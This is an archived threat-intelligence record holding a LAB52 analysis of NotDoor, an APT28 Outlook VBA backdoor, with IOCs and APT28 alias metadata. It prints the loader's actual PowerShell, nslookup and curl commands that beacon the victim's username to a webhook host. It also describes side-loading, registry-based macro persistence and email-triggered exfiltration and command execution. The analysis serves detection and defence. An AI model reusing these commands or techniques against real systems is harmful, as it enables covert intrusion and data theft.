{
	"id": "04334779-2ca3-4b63-8b24-91e9bae4821e",
	"created_at": "2026-04-06T00:15:19.506302Z",
	"updated_at": "2026-04-10T03:37:00.123377Z",
	"deleted_at": null,
	"sha1_hash": "b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84",
	"title": "Analyzing NotDoor: Inside APT28’s Expanding Arsenal",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 265128,
	"plain_text": "Analyzing NotDoor: Inside APT28’s Expanding Arsenal\r\nPublished: 2025-09-03 · Archived: 2026-04-05 16:41:45 UTC\r\nLAB52, the intelligence team at S2 Grupo, has identified a new backdoor for Outlook attributed to the persistent\r\nthreat group APT28, which is linked to the Russian intelligence service and has compromised multiple companies\r\nfrom various sectors in NATO member countries.\r\nThe artefact, dubbed NotDoor due to the use of the word ‘Nothing’ within the code, is a VBA macro for Outlook\r\ndesigned to monitor incoming emails for a specific trigger word. When such an email is detected, it enables an\r\nattacker to exfiltrate data, upload files, and execute commands on the victim’s computer.\r\nBackdoor setup\r\nTo evade detection, the backdoor is deployed via the legitimately signed binary Microsoft OneDrive.exe,\r\nwhich is vulnerable to the DLL side-loading technique. This process loads the malicious DLL\r\nSSPICLI.dll, responsible for installing the VBA backdoor and disabling multiple macro security protections.\r\nThe attacker would have previously placed the backdoor in c:\\programdata\\testtemp.ini to enable this execution\r\nchain.\r\nMalicious DLL detections\r\nThe loader runs three PowerShell commands, each encoded in Base64.\r\nEncoded PowerShell command\r\nThe first command copies the file c:\\programdata\\testtemp.ini to\r\n%APPDATA%\\Microsoft\\Outlook\\VbaProject.OTM, which contains the macros that Outlook will execute.\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 1 of 7\r\n$a=$env:APPDATA;copy c:\\programdata\\testtemp.ini \"$a\\Microsoft\\Outlook\\VbaProject.OTM\"\r\nThe second command performs an nslookup on a domain incorporating the username, using the webhook.site\r\nDNS hooking service previously employed in the group’s campaigns. This appears to serve as a mechanism for\r\nthe attackers to verify that the code executed successfully on the victim’s machine.\r\nnslookup \"$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook[.site\"\r\nFinally, the third command sends a curl request to a webhook.site URL, serving the same purpose.\r\ncmd /c curl \"hxxp://webhook[.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME\"\r\nThe loader establishes persistence by enabling the LoadMacroProviderOnBoot subkey within the\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook registry key.\r\nPersistence\r\nNext, the loader enables macro execution by modifying the Level subkey under\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Security in the Windows registry.\r\nMacro activation\r\nFinally, dialogue messages are disabled by modifying the\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Options\\General registry key, reducing the likelihood of detection by\r\nthe user.\r\nDeactivation of dialogue messages\r\nNotDoor: a silent backdoor\r\nThe backdoor is a VBA project for Outlook that, at the time of analysis, presents few detections.\r\nNotDoor backdoor detections\r\nThe malware leverages the Application_MAPILogonComplete and Application_NewMailEx events to execute\r\ncode whenever Outlook is started or a new email arrives. The project is obfuscated, with variable and function\r\nnames replaced by random alphabetic strings to conceal its behavior. Additionally, the malware employs a unique\r\nstring encoding technique for both internal data and dynamically generated strings. This method involves\r\nprepending random alphanumeric characters to a valid Base64 string, creating the illusion of encryption when\r\ndecoded.\r\nCustom encryption\r\nUpon logging in, the malware will create a folder at the path %TEMP%\\Temp if it does not already exist. This\r\nfolder serves as a repository for various artifacts generated during the malware’s operation. If the folder contains\r\nany files when the malware starts, their contents will be sent via email to a.matti444@proton[.me, with the\r\nsubject line “Re: 0”, after which the files will be deleted, regardless of whether they were successfully sent or not.\r\nExample of an email sent at logon\r\nWhen the client receives an email, it first checks for the presence of a specific string on a designated line that\r\ntriggers the backdoor functions. If the string is found, the malware parses the email’s contents to extract the\r\ncommands to be executed. In the analyzed sample, this trigger string is “Daily Report”; however, the backdoor\r\nallows multiple triggers to be configured, so the string may vary in other instances. Once the backdoor is\r\nactivated, the email that triggered it is deleted.\r\nTrigger\r\nThe received email must follow a specific structure. First, it must include a numerical value that serves as an\r\nidentifier. Next, it must contain an email address for data exfiltration, which is encrypted using the malware’s\r\ncustom encryption algorithm. Finally, the malware supports multiple commands per email, also encrypted using\r\nthe same algorithm. Below is an example of an email that would trigger the backdoor’s functionality.\r\nExample of email\r\nIn particular, the malware allows the following four commands.\r\nCommand Description\r\ncmd Executes commands and returns the standard output as an email attachment.\r\ncmdno Executes commands.\r\ndwn Exfiltrates files from the victim’s computer by sending them as email attachments.\r\nupl Uploads files directly onto the victim’s computer.\r\nList of commands\r\nThe results of these commands will be sent to the sender using an email with the subject line in the following\r\nformat: “Re: \u003cID\u003e \u003cEMAIL SUBJECT\u003e”. The files will be sent as attachments and the results of the execution\r\nwill be sent in the body of the email.\r\nExample of an email sent when the backdoor is activated\r\nFiles exfiltrated by the malware are saved in the %TEMP%\\Temp folder. Each file is named using a predefined list of names and\r\nextensions, following the format \u003cNAME\u003e_\u003cID\u003e.\u003cEXTENSION\u003e. The file contents are encoded using the\r\nmalware’s custom encryption, sent via email, and then deleted from the system.\r\nGenerated file\r\nBelow is a list of possible filenames.\r\nreport\r\ninvoice\r\ncontract\r\nphoto\r\nscheme\r\ndocument\r\nBelow is a list of possible extensions.\r\njpg\r\njpeg\r\ngif\r\nbmp\r\nico\r\npng\r\npdf\r\ndoc\r\ndocx\r\nxls\r\nxlsx\r\nppt\r\npptx\r\nmp3\r\nmp4\r\nxml\r\nConclusion\r\nIn conclusion, this article highlights the ongoing evolution of APT28, demonstrating how it continuously\r\ngenerates new artefacts capable of bypassing established defense mechanisms. Below is a series of indicators of\r\ncompromise that could help detect the threat.\r\nIndicators of Compromise (IOC)\r\nSHA256 Description\r\nfcb6dc17f96af2568d7fa97a6087e4539285141206185aec5c85fa9cf73c9193 onedrive.exe (legit)\r\n5a88a15a1d764e635462f78a0cd958b17e6d22c716740febc114a408eef66705 SSPICLI.dll\r\n8f4bca3c62268fff0458322d111a511e0bcfba255d5ab78c45973bd293379901 testtemp.ini\r\nNetwork indicator Description\r\na.matti444@proton[.me Email used for exfiltration\r\nPath Description\r\n%Temp%\\Test Folder generated by backdoor\r\nc:\\programdata\\testtemp.ini Observed artifact\r\nSource: https://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/"
	],
	"report_names": [
		"analyzing-notdoor-inside-apt28s-expanding-arsenal"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434519,
	"ts_updated_at": 1775792220,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84.pdf",
		"text": "https://archive.orkl.eu/b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84.txt",
		"img": "https://archive.orkl.eu/b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84.jpg"
	}
}